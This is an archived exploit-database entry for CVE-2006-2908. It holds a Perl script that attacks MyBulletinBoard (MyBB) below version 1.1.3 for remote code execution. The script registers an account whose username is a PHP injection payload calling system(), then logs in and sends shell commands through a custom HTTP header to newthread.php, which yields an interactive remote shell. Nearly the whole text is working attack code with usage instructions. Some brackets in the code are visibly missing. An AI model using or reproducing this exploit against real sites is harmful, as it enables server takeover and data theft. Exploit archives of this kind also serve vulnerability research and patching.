MyBulletinBoard MyBB < 1.1.3 - Remote Code Execution Exploit

ID EDB-ID:1909
Type exploitdb
Reporter Javier Olascoaga
Modified 2006-06-13T00:00:00


MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit. CVE-2006-2908. Webapps exploit for php platform

# Tue Jun 13 12:37:12 CEST 2006
# Exploit HOWTO - read this before flood my Inbox you bitch!
# - First you need to create the special user to do this use:
#	./ --host= --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file 
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok, 
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output 
#   for debugging.
# - After you have created the exploit or if you have a valid non common 
#   user, you can execute shell commands.
# 	* Sometimes you have to change the thread Id, --tid is your friend ;)
#	* Don't forget to change the email. You MUST activate the account.
#	* Mejor karate aun dentro ti.
#	* If the admin have the username lenght &lt; 28 this exploit doesn't works
# Greetz to !dSR ppl and unsec
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s'	      =&gt; \$host, 
  'dir=s'	      =&gt; \$dir,
  'proxy=s'           =&gt; \$proxy,
  'proxy_user=s'      =&gt; \$proxy_user,
  'proxy_pass=s'      =&gt; \$proxy_pass,
  'debug'             =&gt; \$debug,
  '1'		      =&gt; \$first_time,
  'tid=s'	      =&gt; \$tid,
  'delete'	      =&gt; \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
	$host = "http://".$host;

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=&gt; { file =&gt; "$$.cookie" });
$ua-&gt;agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua-&gt;proxy(['http'] =&gt; $proxy) if $proxy;
$req-&gt;proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
		login() if !$logged;

		print "mybibi&gt; "; # lost connection
		while(&lt;STDIN&gt;) {

sub send  {
	chomp (my $cmd = shift);
	my $h = $host.$dir."/newthread.php";
	my $req = POST $h, [
		'subject' =&gt; '514',
		'message' =&gt; '/slap 514',
		'previewpost' =&gt; 'Preview Post',
		'action' =&gt; 'do_newthread',
		'fid' =&gt; $tid,
		'posthash' =&gt; 'e0561b22fe5fdf3526eabdbddb221caa'
	$req-&gt;header($uservar =&gt; $cmd);
	print $req-&gt;as_string() if $debug;
	my $res = $ua-&gt;request($req);
	if ($res-&gt;content =~ /You may not post in this/) {
		print "[!] don't have perms to post. Change the Forum ID\n";
	} else {
		my ($data) = $res-&gt;content =~ m/(.*?)\&lt;\!DOCT/is;
		print $data;

sub login {
	my $h  = $host.$dir."/member.php";
	my $req = POST $h,[
		'username' =&gt; $username,
		'password' =&gt; $password,
		'submit' =&gt; 'Login',
		'action' =&gt; 'do_login'
	my $res = $ua-&gt;request($req);
	if ($res-&gt;content =~ /You have successfully been logged/is) {
		print "[*] Login succesful!\n";
		$logged = 1;
	} else {
		print "[!] Error login-in\n";

sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://\n";
    print "\n";

sub create_user {
	# firs we need to get the img.
	my  $h = $host.$dir."/member.php";
	print "Host: $h\n";

	$req = HTTP::Request-&gt;new (GET =&gt; $h."?action=register");
	$res = $ua-&gt;request ($req);

	my $req = POST $h, [
		'action' =&gt; "register",
		'agree' =&gt; "I Agree"
	print $req-&gt;as_string() if $debug;
	$res = $ua-&gt;request($req);

	my $content = $res-&gt;content();
	$content =~ m/.*(image\.php\?action.*?)\".*/is;
	my $img = $1;
	my $req = HTTP::Request-&gt;new (GET =&gt; $host.$dir."/".$img);
	$res = $ua-&gt;request ($req);
	print $req-&gt;as_string();

	if ($res-&gt;content) {
		open (TMP, "&gt;/tmp/file.png") or die($!);
		print TMP $res-&gt;content;
		close (TMP);
		print "[*] /tmp/file.png created.\n";

	my ($hash) = $img =~ m/hash=(.*?)$/;
	my $img_str = get_img_str();
	unlink ("/tmp/file.png");
	$img_str =~ s/\n//g;
	my $req = POST $h, [
		'username' =&gt; $username,
		'password' =&gt; $password,
		'password2' =&gt; $password,
		'email' =&gt; $email,
		'email2' =&gt; $email,
		'imagestring' =&gt; $img_str,
		'imagehash' =&gt; $hash,
		'allownotices' =&gt; 'yes',
		'receivepms' =&gt; 'yes',
		'pmpopup' =&gt; 'no',
		'action' =&gt; "do_register",
		'regsubmit' =&gt; "Submit Registration"
	$res = $ua-&gt;request($req);
	print $req-&gt;as_string() if $debug;

	open (OUT, "&gt;mybibi_out.html");
	print OUT $res-&gt;content;

	print "Check $email for confirmation or mybibi_out.html if there are some error\n";

sub get_img_str ()
	print "\nNow I need the text shown in /tmp/file.png: ";
	my $str = &lt;STDIN&gt;;
	return $str;
exit 0;

# [2006-06-13]